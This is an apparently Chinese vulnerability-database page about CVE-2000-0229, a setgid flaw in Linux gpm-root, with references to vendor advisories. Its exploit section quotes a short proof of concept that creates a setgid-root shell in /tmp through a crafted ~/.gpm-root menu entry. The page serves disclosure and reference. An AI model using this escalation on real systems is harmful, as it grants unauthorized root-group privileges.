多个Linux厂商的gpm Setgid漏洞

多个Linux厂商的gpm Setgid漏洞

漏洞ID 1105758 漏洞类型 设计错误
发布时间 2000-03-22 更新时间 2005-05-02
图片[1]-多个Linux厂商的gpm Setgid漏洞-安全小百科CVE编号 CVE-2000-0229
图片[2]-多个Linux厂商的gpm Setgid漏洞-安全小百科CNNVD-ID CNNVD-200003-041
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19816
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-041
|漏洞详情
gpmpackage包中的gpm-root存在漏洞,他不能正确降低权限,本地用户可以通过开启gpm-root功能取得权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/1069/info

A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.

This vulnerability requires the user have console access. 

cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}

click control-left mouse button, and click "setgid shell"
execute /tmp/sh
|参考资料

来源:BID
名称:1069
链接:http://www.securityfocus.com/bid/1069
来源:REDHAT
名称:RHSA-2000:045
链接:http://www.redhat.com/support/errata/RHSA-2000-045.html
来源:REDHAT
名称:RHSA-2000:009
链接:http://www.redhat.com/support/errata/RHSA-2000-009.html
来源:SUSE
名称:20000405Securityholeingpm<1.18.1
链接:http://www.novell.com/linux/security/advisories/suse_security_announce_45.html
来源:BUGTRAQ
名称:20000322gpm-root
链接:http://archives.neohapsis.com/archives/bugtraq/2000-03/0242.html

相关推荐: Polymorph 0.4 – Filename Buffer Overflow

Polymorph 0.4 – Filename Buffer Overflow 漏洞ID 1053881 漏洞类型 发布时间 2003-05-22 更新时间 2003-05-22 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux CVSS评…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享